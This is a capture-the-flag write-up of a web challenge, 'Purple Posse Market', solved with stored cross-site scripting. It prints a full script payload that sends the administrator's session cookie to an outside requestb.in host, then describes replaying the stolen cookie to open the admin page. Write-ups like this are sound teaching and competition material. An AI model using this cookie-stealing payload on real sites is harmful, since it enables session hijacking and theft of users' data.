Purple Posse Market was a web challenge in which you had to steal the administrator's personal information. The challenge is an application of a cross-site scripting (XSS) attack.
You work for the government in the forensic department. You are investigating an illegal website that sells drugs and weapons, and you need to find a way to obtain the IBAN of the website's administrator.
Figure 1: Main page
The website looks like a simple store where you can order drugs, weapons and purple stuff!
There is also a Contact page from which you can send an email to the administrator.
Figure 2: The administrator is currently online
The first thing that comes to mind for this contact page is cookie stealing: if the administrator reads our message in a browser and the message is rendered as HTML, a script we embed in it runs in the administrator's session.
Figure 3: <script>document.write('<IMG SRC="http://requestb.in/xxxxxxxx?cookie='+document.cookie+'">Hacked</IMG>');</script>
A few seconds later the administrator visits our requestb.in URL, which tells us that our XSS worked perfectly.
We now have the "connect.sid" cookie that belongs to the administrator:
Let's use this cookie and try to access the admin web page with this HTTP header:
Finally we obtained this page:
Figure 4: http://purplepossemarket.quals.nuitduhack/admin
Which quite simply gives us the Flag: IBAN FR14 2004 1010 0505 0001 3M02 606
Many thanks to Sysdream for having organized this event.